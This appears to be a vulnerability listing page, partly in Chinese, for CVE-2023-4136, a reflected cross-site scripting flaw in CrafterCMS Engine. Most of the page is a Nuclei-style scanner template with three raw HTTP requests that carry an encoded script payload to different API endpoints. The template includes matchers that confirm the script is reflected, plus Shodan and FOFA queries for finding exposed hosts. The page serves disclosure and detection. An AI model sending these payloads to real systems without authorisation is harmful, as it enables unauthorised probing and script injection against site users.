CVE-2023-4136: CrafterCMS Engine - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: CrafterCMS Engine | POC: 已公开

漏洞描述

CrafterCMS Engine is vulnerable to reflected cross-site scripting (XSS) via the transformerName parameter in the /api/1/site/url/transform endpoint, allowing attackers to execute arbitrary JavaScript in the context of the user.

PoC代码[已公开]

id: CVE-2023-4136

info:
  name: CrafterCMS Engine - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    CrafterCMS Engine is vulnerable to reflected cross-site scripting (XSS) via the transformerName parameter in the /api/1/site/url/transform endpoint, allowing attackers to execute arbitrary JavaScript in the context of the user.
  remediation: |
    Update CrafterCMS Engine to the latest version that addresses this vulnerability.
  reference:
    - https://karmainsecurity.com/KIS-2023-09
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4136
  classification:
    cve-id: CVE-2023-4136
    cwe-id: CWE-79
    epss-score: 0.12327
    epss-percentile: 0.9364
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
    cvss-score: 6.1
  metadata:
    verified: true
    max-request: 1
    vendor: craftercms
    product: craftercms
    shodan-query: http.html:"craftercms"
    fofa-query: body="craftercms"
  tags: cve,cve2023,craftercms,xss

http:
  - raw:
      - |
        GET /api/1/site/url/transform?transformerName=%3Cscript%20xmlns%3D%22http%3A//www.w3.org/1999/xhtml%22%3Ealert(document.domain)%3C/script%3E&url= HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml

      - |
        GET /api/1/site/content_store/children?url=%3Cscript%20xmlns%3D%22http%3A//www.w3.org/1999/xhtml%22%3Ealert(document.domain)%3C/script%3E HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml

      - |
        GET /api/1/site/content_store/item?url=%3Cscript%20xmlns%3D%22http%3A//www.w3.org/1999/xhtml%22%3Ealert(document.domain)%3C/script%3E HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 500 || status_code == 404'
          - 'contains(content_type, "application/xhtml+xml")'
          - 'contains(body, "<script xmlns=\"http://www.w3.org/1999/xhtml\">alert(document.domain)</script>")'
          - 'contains_any(body, "Url transformer", "No folder found at", "No item found at")'
        condition: and
# digest: 4b0a00483046022100da5dbb0207ab66ad047985fd47576aa3a15d5fd4b2a8c0cb565c79029006f157022100b6e74b271d7560f9fa6c98d6710782a9ffbdd390b9d76ce05a36463247bec832:922c64590222798bb761d5b6d8e72950

相关漏洞推荐